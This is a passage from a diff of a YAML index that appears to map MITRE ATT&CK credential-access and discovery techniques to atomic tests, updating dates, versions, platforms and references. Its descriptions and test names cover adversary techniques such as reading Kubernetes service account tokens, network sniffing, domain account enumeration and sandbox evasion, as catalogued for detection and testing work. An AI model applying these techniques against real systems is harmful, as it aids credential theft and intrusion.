+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -58241,9 +58961,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests:
     - name: Cat the contents of a Kubernetes service account token file
@@ -58340,7 +59059,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -58364,8 +59083,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -58430,7 +59147,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests:
     - name: System Owner/User Discovery
@@ -58450,7 +59166,7 @@ discovery:
         name: sh
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -58509,7 +59225,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -58530,7 +59245,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -58551,8 +59266,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests:
     - name: Check internet connection using ping freebsd, linux or macos
@@ -58577,7 +59290,7 @@ discovery:
           '
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -58600,15 +59313,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -58634,13 +59346,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -58665,12 +59376,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -58712,13 +59422,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -58779,12 +59488,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -58848,19 +59556,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -58907,7 +59614,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests:
     - name: Active Directory Domain Search
@@ -59063,7 +59769,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests:
     - name: Enumerate all accounts (Local)
@@ -59199,7 +59904,7 @@ discovery:
         name: sh
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -59289,13 +59994,12 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests:
     - name: Detect Virtualization Environment (Linux)
@@ -59327,7 +60031,7 @@ discovery:
           '
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -59370,7 +60074,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests:
     - name: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
@@ -59419,7 +60122,7 @@ discovery:
         name: sh
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -59460,7 +60163,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests:
     - name: System Service Discovery - systemctl/service
@@ -59478,7 +60180,7 @@ discovery:
         name: bash
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -59563,7 +60265,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests:
     - name: Packet Capture Linux using tshark or tcpdump
@@ -59913,7 +60614,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests:
     - name: Network Share Discovery - linux
@@ -59983,7 +60683,7 @@ discovery:
         elevation_required: true
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -60034,12 +60734,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -60050,7 +60749,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -60065,7 +60763,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -60113,7 +60810,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests:
     - name: List OS Information
@@ -60314,12 +61012,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -60361,122 +61058,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -60491,6 +61139,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -60500,9 +61154,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -60512,8 +61171,44 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests:
     - name: Delay execution with ping
@@ -60542,91 +61237,90 @@ discovery:
         name: sh
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
